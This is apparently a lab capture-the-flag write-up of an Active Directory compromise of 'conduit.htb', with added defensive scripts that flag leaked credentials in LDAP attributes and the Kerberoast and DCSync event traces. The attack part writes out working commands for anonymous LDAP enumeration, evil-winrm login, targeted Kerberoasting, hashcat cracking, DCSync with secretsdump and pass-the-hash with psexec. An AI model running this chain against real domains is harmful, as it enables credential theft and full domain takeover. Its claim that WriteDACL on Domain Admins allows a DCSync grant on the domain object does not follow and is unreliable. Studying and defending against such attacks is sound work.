Enumeration
Port Scan
nmap -sCV -p- --min-rate 5000 -T4 10.10.11.112 -oN conduit.nmap
# Key open ports (Windows DC pattern):
# 53/tcp open domain Simple DNS Plus
# 88/tcp open kerberos-sec Microsoft Windows Kerberos
# 135/tcp open msrpc
# 389/tcp open ldap Microsoft Windows Active Directory LDAP
# 445/tcp open microsoft-ds
# 3268/tcp open ldap Global Catalog
# 5985/tcp open http Microsoft HTTPAPI (WinRM)
#
# Domain: conduit.htb | DC: DC01.conduit.htb
Anonymous LDAP Bind
The domain controller accepts anonymous LDAP binds, exposing the full directory. Querying all user objects and their attributes with no credentials reveals a plaintext password in the description field of the j.porter account:
ldapsearch -x -H ldap://10.10.11.112 \
-b "DC=conduit,DC=htb" \
"(objectClass=user)" \
sAMAccountName description memberOf
# dn: CN=Jordan Porter,CN=Users,DC=conduit,DC=htb
# sAMAccountName: j.porter
# description: Temp pass = Summer2026! ← plaintext credential
# memberOf: CN=Remote Management Users,CN=Builtin,DC=conduit,DC=htb
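The defensive counterpart to the query above, added here as an example that is not part of the original write-up: an audit that scans an LDIF export (the kind of output ldapsearch produces) for credential-looking text in the description, info and comment attributes, the attributes any authenticated user, and here anyone, can read. The LDIF is constructed sample data; the example.local domain and the a.example, svc_backup and b.example accounts are invented, and the regexes are heuristics to tune per environment.

```python
"""Audit an LDIF export for credentials leaked in user description/info/comment.
Added example; SAMPLE_LDIF is constructed data modelled on ldapsearch output."""
import base64
import re

# Attributes readable by every authenticated user (and by anonymous bind where
# it is enabled); they must never carry secrets.
WATCHED_ATTRS = ("description", "info", "comment")

# Heuristics for credential-looking text. A mandatory ':' or '=' after the
# keyword keeps benign mentions such as "Password reset ticket" from matching.
CREDENTIAL_PATTERNS = (
    re.compile(r"\b(pass(word)?|passwd|pwd|pw)\b\s*[:=]\s*\S+", re.I),
    re.compile(r"\b(temp|initial|default)\s+(pass(word)?|pwd)\b", re.I),
    re.compile(r"[A-Za-z]+\d{4}[!@#$%^&*]"),  # Word + year + symbol, e.g. Summer2026!
)

LDIF_LINE = re.compile(r"^([A-Za-z][\w;-]*)(::?) ?(.*)$")


def parse_ldif(text):
    """Parse a minimal LDIF dump into a list of {attribute: [values]} dicts.
    Handles '::' base64 values and folded continuation lines (leading space)."""
    unfolded = []
    for line in text.splitlines():
        if line.startswith(" ") and unfolded:
            unfolded[-1] += line[1:]  # continuation of the previous line
        else:
            unfolded.append(line)

    entries, current = [], {}
    for line in unfolded:
        if not line.strip():           # blank line ends an entry
            if current:
                entries.append(current)
                current = {}
            continue
        if line.startswith("#"):       # ldapsearch comment lines
            continue
        m = LDIF_LINE.match(line)
        if not m:
            continue
        attr, sep, value = m.groups()
        if sep == "::":                # base64-encoded value
            value = base64.b64decode(value).decode("utf-8", "replace")
        current.setdefault(attr, []).append(value)
    if current:
        entries.append(current)
    return entries


def find_leaked_credentials(ldif_text):
    """Return (account, attribute, value) for every watched attribute value
    that looks like it holds a credential."""
    findings = []
    for entry in parse_ldif(ldif_text):
        name = entry.get("sAMAccountName", entry.get("dn", ["<no name>"]))[0]
        for attr in WATCHED_ATTRS:
            for value in entry.get(attr, []):
                if any(p.search(value) for p in CREDENTIAL_PATTERNS):
                    findings.append((name, attr, value))
    return findings


# Constructed sample (not real data); mirrors the shape of ldapsearch output.
SAMPLE_LDIF = """\
# extended LDIF
dn: CN=Jordan Porter,CN=Users,DC=example,DC=local
sAMAccountName: j.porter
description: Temp pass = Summer2026!
memberOf: CN=Remote Management Users,CN=Builtin,DC=example,DC=local

dn: CN=Alice Example,CN=Users,DC=example,DC=local
sAMAccountName: a.example
description: Finance team lead

dn: CN=Service Backup,CN=Users,DC=example,DC=local
sAMAccountName: svc_backup
info:: cHdkOiBCYWNrdXAhMjAyNg==

dn: CN=Bob Example,CN=Users,DC=example,DC=local
sAMAccountName: b.example
comment: Password reset ticket #4521 closed
"""

if __name__ == "__main__":
    for account, attr, value in find_leaked_credentials(SAMPLE_LDIF):
        print(f"[!] {account}: {attr} = {value!r}")
```

Run against a real export with `ldapsearch ... -LLL > users.ldif` and pass the file contents to `find_leaked_credentials`; the base64 branch matters because ldapsearch encodes any value with non-ASCII or leading/trailing whitespace, which a plain grep for "pass" would miss.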
WinRM Foothold
evil-winrm -i 10.10.11.112 -u j.porter -p 'Summer2026!'
# *Evil-WinRM* PS C:\Users\j.porter\Documents>
# type C:\Users\j.porter\Desktop\user.txt
# 5d3a7c... ← user flag
BloodHound — Mapping the Attack Path
Collecting AD Data
# From WinRM session:
upload /opt/BloodHound/Collectors/SharpHound.exe
.\SharpHound.exe -c All --outputdirectory C:\Windows\Temp\bh
download C:\Windows\Temp\bh\20260616123045_BloodHound.zip
Importing the ZIP into BloodHound and running the Shortest Paths to Domain Admins query reveals the attack path:
# j.porter —[GenericWrite]→ svc_reports
# svc_reports —[WriteDACL]→ Domain Admins
j.porter holds GenericWrite over the svc_reports service account. GenericWrite allows modifying any non-protected attribute, including servicePrincipalName, which enables targeted Kerberoasting. Once the svc_reports TGS is cracked, that account's WriteDACL over Domain Admins allows granting DCSync rights.
Targeted Kerberoasting via GenericWrite
Setting an SPN on svc_reports
# From evil-winrm session as j.porter
Set-ADUser svc_reports -ServicePrincipalNames @{Add='HTTP/fake.conduit.htb'}
# Confirm SPN is set
Get-ADUser svc_reports -Properties ServicePrincipalName |
Select-Object -ExpandProperty ServicePrincipalName
# HTTP/fake.conduit.htb
Requesting and Cracking the TGS
# From attacker machine — request TGS for svc_reports
GetUserSPNs.py conduit.htb/j.porter:'Summer2026!' \
-dc-ip 10.10.11.112 \
-request \
-outputfile svc_reports.tgs
# Crack offline
hashcat -m 13100 svc_reports.tgs /usr/share/wordlists/rockyou.txt
# $krb5tgs$23$*svc_reports$...:R3p0rt5erv!ce2026
# Status: Cracked
Privilege Escalation — WriteDACL to DCSync
Granting DCSync Rights
svc_reports holds WriteDACL on the Domain Admins group object. DCSync requires two extended rights on the domain object itself: DS-Replication-Get-Changes and DS-Replication-Get-Changes-All. Using PowerView, grant these rights to svc_reports:
# Authenticate as svc_reports in the WinRM session
$pass = ConvertTo-SecureString 'R3p0rt5erv!ce2026' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('conduit\svc_reports', $pass)
# Import PowerView
Import-Module .\PowerView.ps1
# Grant DCSync rights to svc_reports on the domain object
Add-DomainObjectAcl -Credential $cred `
-TargetIdentity "DC=conduit,DC=htb" `
-PrincipalIdentity svc_reports `
-Rights DCSync
Write-Host "[+] DCSync rights granted"
DCSync — Dumping the Domain
secretsdump.py conduit.htb/svc_reports:'R3p0rt5erv!ce2026'@10.10.11.112
# [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
# [*] Using the DRSUAPI method to get NTDS.DIT secrets
# Administrator:500:aad3b435b51404eeaad3b435b51404ee:3b4f3e5a8c2d91f7e2c4b6a9d0e1f250:::
# ...
# Pass-the-hash for interactive shell
psexec.py conduit.htb/Administrator@10.10.11.112 \
-hashes aad3b435b51404eeaad3b435b51404ee:3b4f3e5a8c2d91f7e2c4b6a9d0e1f250
# C:\Windows\system32> whoami
# nt authority\system
# C:\Windows\system32> type C:\Users\Administrator\Desktop\root.txt
# 8b3e1f... ← root flag
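Each step of the chain above leaves a distinct trace in the Security log on the domain controller, and the following detection logic, added here as an example that is not part of the original write-up, flags all three: a servicePrincipalName write on a user object (event 5136, requires Directory Service Changes auditing with a SACL on the object), an RC4 service-ticket request for a user-backed SPN (event 4769), and replication extended rights exercised by anything other than a domain controller (event 4662). The events are constructed dicts modelled on the EventData fields of those three events; the example.local domain, the DC01$/DC02$ inventory and the IP address are assumptions.

```python
"""Detections for the three stages walked through above: SPN written on a user,
RC4 service-ticket request for that user, and replication rights exercised by a
non-DC account. Added example; SAMPLE_EVENTS are constructed dicts modelled on
the EventData fields of Windows Security events 5136, 4769 and 4662."""
import re

# Extended-right GUIDs from the AD schema that DCSync needs (well-known values)
DS_REPL_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPL_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
REPLICATION_RIGHTS = {DS_REPL_GET_CHANGES, DS_REPL_GET_CHANGES_ALL}
RC4_HMAC = "0x17"  # TicketEncryptionType value for etype 23 in event 4769
GUID_RE = re.compile(r"\{([0-9a-f-]{36})\}", re.I)

# Assumed inventory of DC computer accounts; replication between DCs is normal.
DOMAIN_CONTROLLERS = {"DC01$", "DC02$"}


def detect_spn_write(events):
    """5136 (Directory Service Changes) touching servicePrincipalName on a user
    object. Computer objects register SPNs routinely, so only user-class objects
    are flagged."""
    return [
        {"rule": "spn-written-on-user", "actor": e["SubjectUserName"],
         "target": e["ObjectDN"], "spn": e["AttributeValue"]}
        for e in events
        if e["EventID"] == 5136
        and e["ObjectClass"].lower() == "user"
        and e["AttributeLDAPDisplayName"].lower() == "serviceprincipalname"
    ]


def detect_kerberoast(events):
    """4769 with RC4 (0x17) for a service backed by a user account, i.e. not
    krbtgt and not a machine account (name ending in '$')."""
    return [
        {"rule": "rc4-tgs-for-user-spn", "requester": e["TargetUserName"],
         "service": e["ServiceName"], "src": e["IpAddress"]}
        for e in events
        if e["EventID"] == 4769
        and e["TicketEncryptionType"].lower() == RC4_HMAC
        and e["ServiceName"].lower() != "krbtgt"
        and not e["ServiceName"].endswith("$")
    ]


def detect_dcsync(events, domain_controllers=DOMAIN_CONTROLLERS):
    """4662 whose Properties list a replication extended right, raised by an
    account that is not a domain controller."""
    alerts = []
    for e in events:
        if e["EventID"] != 4662:
            continue
        rights = {g.lower() for g in GUID_RE.findall(e["Properties"])} & REPLICATION_RIGHTS
        if rights and e["SubjectUserName"] not in domain_controllers:
            alerts.append({"rule": "dcsync-by-non-dc", "actor": e["SubjectUserName"],
                           "rights": sorted(rights)})
    return alerts


def run_all(events, domain_controllers=DOMAIN_CONTROLLERS):
    return (detect_spn_write(events) + detect_kerberoast(events)
            + detect_dcsync(events, domain_controllers))


# 4662 Properties is a multi-line string of {GUID}s (real events prefix it with
# an access-type resource string, which GUID_RE simply ignores).
REPL_PROPERTIES = ("{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"
                   "\n\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}")

# Constructed sample events (the example.local domain and IP are invented).
SAMPLE_EVENTS = [
    # SPN added to a user object by a low-privileged account -> alert
    {"EventID": 5136, "SubjectUserName": "j.porter", "ObjectClass": "user",
     "ObjectDN": "CN=svc_reports,CN=Users,DC=example,DC=local",
     "AttributeLDAPDisplayName": "servicePrincipalName",
     "AttributeValue": "HTTP/fake.example.local"},
    # RC4 service ticket for that user-backed SPN -> alert
    {"EventID": 4769, "TargetUserName": "j.porter@EXAMPLE.LOCAL", "ServiceName": "svc_reports",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.0.0.25"},
    # AES ticket for a machine-account service -> normal
    {"EventID": 4769, "TargetUserName": "j.porter@EXAMPLE.LOCAL", "ServiceName": "DC01$",
     "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.0.0.25"},
    # Replication rights exercised by another DC -> normal
    {"EventID": 4662, "SubjectUserName": "DC02$", "Properties": REPL_PROPERTIES},
    # Same rights exercised by a service account -> DCSync alert
    {"EventID": 4662, "SubjectUserName": "svc_reports", "Properties": REPL_PROPERTIES},
]

if __name__ == "__main__":
    for alert in run_all(SAMPLE_EVENTS):
        print(alert)
```

The 4662 rule is the one worth keeping even where the other two are noisy: a DC-inventory allowlist is small and stable, and legitimate non-DC replication consumers (Azure AD Connect, for instance) can be added to it explicitly rather than tolerated as background noise.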
Key Takeaways
- Anonymous LDAP bind should be disabled on domain controllers.
  Active Directory permits anonymous LDAP queries by default in older domain functional levels. Enabling ldapServerIntegrity and setting the dsHeuristics value to require signed and sealed LDAP connections prevents unauthenticated directory enumeration. At minimum, the description, info, and comment attributes on user objects must never contain credentials or sensitive operational notes — these attributes are readable by all authenticated users and often by anonymous bind.
- GenericWrite over any account is equivalent to targeted Kerberoasting capability.
  The ability to write arbitrary attributes on a user account includes the ability to set or clear servicePrincipalName. An account with no SPN today can become Kerberoastable tomorrow by anyone with GenericWrite. BloodHound's Shortest Paths to High Value Targets query surfaces these relationships in seconds — running BloodHound internally should be a regular purple-team exercise, not only a red-team artefact.
- WriteDACL on a group or domain object is a domain escalation path regardless of group membership.
  WriteDACL allows modifying the DACL of an object, which in Active Directory means granting arbitrary extended rights. On the domain naming context object, this translates directly to granting DCSync. On Domain Admins, it translates to adding arbitrary members. Neither requires administrative credentials to execute. Excessive DACL permissions are one of the most common findings in enterprise Active Directory environments and one of the least visible without purpose-built tooling.